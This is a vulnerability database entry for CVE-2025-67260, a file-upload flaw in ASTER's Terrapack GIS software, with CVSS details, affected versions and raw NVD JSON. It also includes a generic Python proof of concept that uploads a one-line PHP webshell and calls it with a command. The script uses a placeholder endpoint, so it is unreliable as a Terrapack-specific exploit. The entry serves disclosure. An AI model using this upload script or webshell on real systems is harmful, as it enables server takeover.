Security Vulnerability Report
中文
CVE-2025-67260 CVSS 8.8 HIGH

CVE-2025-67260

Published: 2026-03-20 16:16:16
Last Modified: 2026-04-14 20:54:09

Description

The Terrapack software, from ASTER TEC / ASTER S.p.A., with the indicated components and versions has a file upload vulnerability that may allow attackers to execute arbitrary code. Vulnerable components include Terrapack TkWebCoreNG:: 1.0.20200914, Terrapack TKServerCGI 2.5.4.150, and Terrapack TpkWebGIS Client 1.0.0.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:aster-te:terrapack_tkservercgi:2.5.4.150:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:aster-te:terrapack_tkwebcoreng:1.0.20200914:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:aster-te:terrapack_tpkwebgis:1.0.0:*:*:*:*:*:*:* - VULNERABLE
Terrapack TkWebCoreNG 1.0.20200914
Terrapack TKServerCGI 2.5.4.150
Terrapack TpkWebGIS Client 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://target-ip/upload_endpoint" username = "low_priv_user" password = "password" # Malicious payload (e.g., PHP webshell) payload_content = "<?php system($_GET['cmd']); ?>" # Prepare the file upload files = { 'uploaded_file': ('exploit.php', payload_content, 'application/octet-stream') } data = { 'action': 'upload' } try: # Send request with authentication response = requests.post(target_url, files=files, data=data, auth=(username, password)) if response.status_code == 200 and "upload successful" in response.text.lower(): print("[+] File uploaded successfully.") print(f"[+] Access your shell at: {target_url.replace('upload_endpoint', 'uploads/exploit.php')}?cmd=whoami") else: print("[-] Upload failed or unexpected response.") print(response.text) except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67260", "sourceIdentifier": "[email protected]", "published": "2026-03-20T16:16:16.490", "lastModified": "2026-04-14T20:54:09.390", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Terrapack software, from ASTER TEC / ASTER S.p.A., with the indicated components and versions has a file upload vulnerability that may allow attackers to execute arbitrary code. Vulnerable components include Terrapack TkWebCoreNG:: 1.0.20200914, Terrapack TKServerCGI 2.5.4.150, and Terrapack TpkWebGIS Client 1.0.0."}, {"lang": "es", "value": "El software Terrapack, de ASTER TEC / ASTER S.p.A., con los componentes y versiones indicados tiene una vulnerabilidad de carga de archivos que puede permitir a los atacantes ejecutar código arbitrario. Los componentes vulnerables incluyen Terrapack TkWebCoreNG:: 1.0.20200914, Terrapack TKServerCGI 2.5.4.150 y Terrapack TpkWebGIS Cliente 1.0.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aster-te:terrapack_tkservercgi:2.5.4.150:*:*:*:*:*:*:*", "matchCriteriaId": "1FA18769-1063-4C18-8E1E-0D699E9B3107"}, {"vulnerable": true, "criteria": "cpe:2.3:a:aster-te:terrapack_tkwebcoreng:1.0.20200914:*:*:*:*:*:*:*", "matchCriteriaId": "531E6FC2-4DCF-4FBC-8552-C68D5563642F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:aster-te:terrapack_tpkwebgis:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "9006E1BD-8656-4E50-A073-60C6ABBABFB4"}]}]}], "references": [{"url": "http://aster.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "http://terrapack.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/edi-marc/Vulnerability_List/tree/main/CVE_Terrapack", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://packetstorm.news/files/id/217271", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.acn.gov.it/portale/en/csirt-italia", "source": "[email protected]", "tags": ["Broken Link"]}]}}